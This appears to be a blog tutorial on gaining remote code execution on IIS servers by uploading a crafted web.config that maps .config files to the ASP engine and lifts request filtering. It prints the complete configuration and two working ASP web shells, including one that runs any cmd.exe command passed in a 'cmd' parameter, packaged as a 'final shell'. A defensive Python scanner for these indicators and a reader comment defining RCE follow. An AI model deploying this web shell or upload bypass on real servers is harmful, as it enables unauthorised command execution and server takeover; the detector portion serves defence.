
Remote code execution using web.config file.


Often we have a file upload function but are not able to upload our .aspx file, even after trying every client-side bypass technique.


A web.config file is a per-directory control file: it lets you customize the way your site behaves in that particular directory. If you create a web.config file in the root directory, it affects the whole site.

This had some example code in it to actually execute code from the web.config. (Thanks Soroush!)

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
  <appSettings>
  </appSettings>
</configuration>

After this you can add your ASP shell.

<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

szCMD = request("cmd")

If (szCMD <> "") Then
szTempFile = "c:\inetpub\wwwroot\uploadedfiles\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>

<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

Or you can add this instead; either one will do.

<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("ipconfig")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>

So your final shell looks like this.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>

<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

szCMD = request("cmd")

If (szCMD <> "") Then
szTempFile = "c:\inetpub\wwwroot\uploadedfiles\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>

<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

The <handlers accessPolicy="Read, Script, Write"> setting gives the web.config file read and write permission. We can then add ASP code inside <% %>, and that code executes when the web.config file is requested in the browser, which gives us remote code execution.
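A defender-side check for the configuration described above, added here as an example and not part of the original post: it rejects upload names that Windows would store as web.config and flags the settings this web.config relies on in files already on disk. The function names, rule names and both sample inputs are constructed for illustration; regexes are used instead of an XML parser so untrusted or malformed files are never parsed.

```python
import re

Q = r'["\']'  # attribute values may use either quote style
# Indicators taken from the web.config shown on this page (rule names are illustrative)
RULES = {
    # handler mapping that sends requests for *.config files to a script engine
    "config-handler": re.compile(rf'<add\b[^>]*\bpath\s*=\s*{Q}[^"\']*\.config{Q}', re.I),
    # Write added to the handlers access policy
    "write-access-policy": re.compile(rf'\baccessPolicy\s*=\s*{Q}[^"\']*\bWrite\b', re.I),
    # request-filtering rules removed so that web.config can be requested
    "unblocks-config-ext": re.compile(rf'<remove\b[^>]*\bfileExtension\s*=\s*{Q}\.config{Q}', re.I),
    "unhides-web-config": re.compile(rf'<remove\b[^>]*\bsegment\s*=\s*{Q}web\.config{Q}', re.I),
    # classic ASP delimiters do not belong in a configuration file
    "asp-script-block": re.compile(r'<%'),
}

def is_config_name(filename: str) -> bool:
    """True if Windows would store this upload name as web.config."""
    name = re.split(r'[\\/]', filename)[-1]  # drop any client-supplied path
    name = name.split(':', 1)[0]             # drop an NTFS stream suffix (::$DATA)
    return name.rstrip(' .').lower() == 'web.config'  # trailing dots/spaces are stripped

def decode(raw: bytes) -> str:
    """Decode UTF-16 (with BOM) or UTF-8 so encoding changes do not hide indicators."""
    if raw[:2] in (b'\xff\xfe', b'\xfe\xff'):
        return raw.decode('utf-16', errors='replace')
    return raw.decode('utf-8-sig', errors='replace')

def scan(raw: bytes) -> list:
    """Return the names of all rules that match the file content."""
    text = decode(raw)
    return [rule for rule, rx in RULES.items() if rx.search(text)]

# Constructed samples: the page's configuration (script body omitted) and a benign file
SUSPECT = rb'''<configuration><system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule"
 scriptProcessor="%windir%\system32\inetsrv\asp.dll" requireAccess="Write" />
</handlers>
<security><requestFiltering>
<fileExtensions><remove fileExtension=".config" /></fileExtensions>
<hiddenSegments><remove segment="web.config" /></hiddenSegments>
</requestFiltering></security>
</system.webServer></configuration>
<% Rem script body omitted %>'''
BENIGN = b'''<configuration><system.webServer>
<handlers accessPolicy="Read, Script"><add name="png" path="*.png" verb="GET"
 modules="StaticFileModule" resourceType="File" /></handlers>
</system.webServer></configuration>'''
```

Any single hit in a web.config under an upload directory warrants review; an upload gate should call is_config_name before the file is written.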

Code reference: https://poc-server.com/


1 thought on “Remote code execution using web.config file.”

  1. Kevincog says:

    In computer security, arbitrary code execution (ACE) is used to describe an attacker’s ability to execute arbitrary commands or code on a target machine or in a target process. An arbitrary code execution vulnerability is a security flaw in software or hardware allowing arbitrary code execution. A program that is designed to exploit such a vulnerability is called an arbitrary code execution exploit. The ability to trigger arbitrary code execution over a network (especially via a wide-area network such as the Internet) is often referred to as remote code execution (RCE).
